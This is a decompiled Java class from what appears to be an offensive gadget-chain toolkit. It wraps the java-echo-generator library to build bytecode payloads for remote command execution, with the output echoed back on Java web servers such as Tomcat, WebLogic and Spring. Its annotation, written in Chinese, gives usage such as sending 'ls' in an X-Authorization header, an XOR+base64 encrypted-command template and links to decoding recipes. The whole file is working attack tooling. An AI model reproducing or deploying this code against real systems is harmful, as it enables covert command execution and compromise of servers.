package com.ar3h.chains.gadget.impl.bytecode.echo;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;
import com.ar3h.chains.common.util.Reflections;
import jeg.common.config.Constants;
import jeg.core.config.jEGConfig;
import jeg.core.config.jEGConstants;
import jeg.core.jEGenerator;
import oracle.jdbc.OracleConnection;
import org.eclipse.osgi.storage.Storage;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;

@GadgetAnnotation(name = "调用 Jeg 生成回显字节码", description = "方法一、明文传参及回显\n执行ls命令: X-Authorization: ls\n\n方法二、加密传参及回显\n模板:\t\tX-Authorization: eyJeXA10TbkhnteAiS0PtwRFQKqp5EYIIWXXXLKXDf5NPTs2M1FykATD[xor+base64 命令].eyJ82Df13d=\n执行ls命令:\t\tX-Authorization: eyJeXA10TbkhnteAiS0PtwRFQKqp5EYIIWXXXLKXDf5NPTs2M1FykATDU0w=.eyJ82Df13d=\n<a href=\"https://gchq.github.io/CyberChef/#recipe=XOR(%7B'option':'UTF8','string':'?????'%7D,'Standard',false)To_Base64('A-Za-z0-9%2B/%3D')&input=bHM&oeol=CR\" target=\"_blank\">请求参数加密辅助, 点击即可展开</a>\n<a href=\"https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Simple%20string','string':'/9j/4A'%7D,'',true,false,true,false)Find_/_Replace(%7B'option':'Simple%20string','string':'/9k%3D%3D'%7D,'',true,false,true,false)From_Base64('A-Za-z0-9%2B/%3D',true,false)XOR(%7B'option':'UTF8','string':'??'%7D,'Standard',false)\" target=\"_blank\">命令执行响应解密辅助, 点击即可展开</a>\n\n原项目地址：https://github.com/pen4uin/java-echo-generator\n本平台内置Jeg版本v1.0.0, 2024年12月06日更新\n您也可以选择手动在原版 java-echo-generator 中生成Base64编码格式的回显字节码，然后复制到 BytecodeFromBase64 模块中，实现相同效果", authors = {Authors.Pen4uin}, priority = 10)
@GadgetTags(tags = {Tag.Bytecode, Tag.Echo, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/bytecode/echo/JegGadget.class */
public class JegGadget implements Gadget {
    private static final Logger log = LoggerFactory.getLogger((Class<?>) JegGadget.class);

    @Param(name = "中间件类型", description = "可选项: Tomcat, SpringMVC, Jetty, Resin, WebLogic, Struts2, Undertow, WebSphere, Unknown", type = ParamType.Choice, choices = {@Choice("Tomcat"), @Choice("SpringMVC"), @Choice("Jetty"), @Choice("Resin"), @Choice("WebLogic"), @Choice(Constants.SERVER_STRUTS2), @Choice("Undertow"), @Choice("WebSphere"), @Choice("Unknown")})
    public String serverType = "Tomcat";

    @Param(name = "请求header", description = "命令执行的请求头")
    public String header = "X-Authorization";

    @Param(name = "请求参数", description = "适用于代码加载的场景")
    public String param = Storage.BUNDLE_DATA_DIR;

    @Param(name = "响应header")
    public String respHeader = "Via";

    @Param(name = "模式", description = "可选项 {Command: 命令执行, Code: 字节码加载}", type = ParamType.Choice, choices = {@Choice(jEGConstants.MODEL_CMD), @Choice("Code")})
    public String model = jEGConstants.MODEL_CMD;

    public byte[] getObject() throws Exception {
        jEGConfig jegconfig = new jEGConfig() { // from class: com.ar3h.chains.gadget.impl.bytecode.echo.JegGadget.1
            {
                setServerType(JegGadget.this.serverType);
                setReqParamName(JegGadget.this.param);
                setModelType(JegGadget.this.model);
                setReqHeaderName(JegGadget.this.header);
                setRespHeaderName(JegGadget.this.respHeader);
                setFormatType(OracleConnection.CONNECTION_PROPERTY_THIN_VSESSION_PROCESS_DEFAULT);
                build();
            }
        };
        jEGenerator jegenerator = null;
        synchronized (JegGadget.class) {
            try {
                jegenerator = new jEGenerator(jegconfig);
            } catch (Throwable th) {
                log.error(th.getMessage());
                ThrowsUtil.throwGadgetException(th.getMessage());
            }
            log.info("Jeg request header name: " + jegconfig.getReqHeaderName());
        }
        return (byte[]) Reflections.getFieldValue(jegenerator, "clazzBytes");
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        gadgetChain.doCreate(gadgetContext);
        return getObject();
    }
}
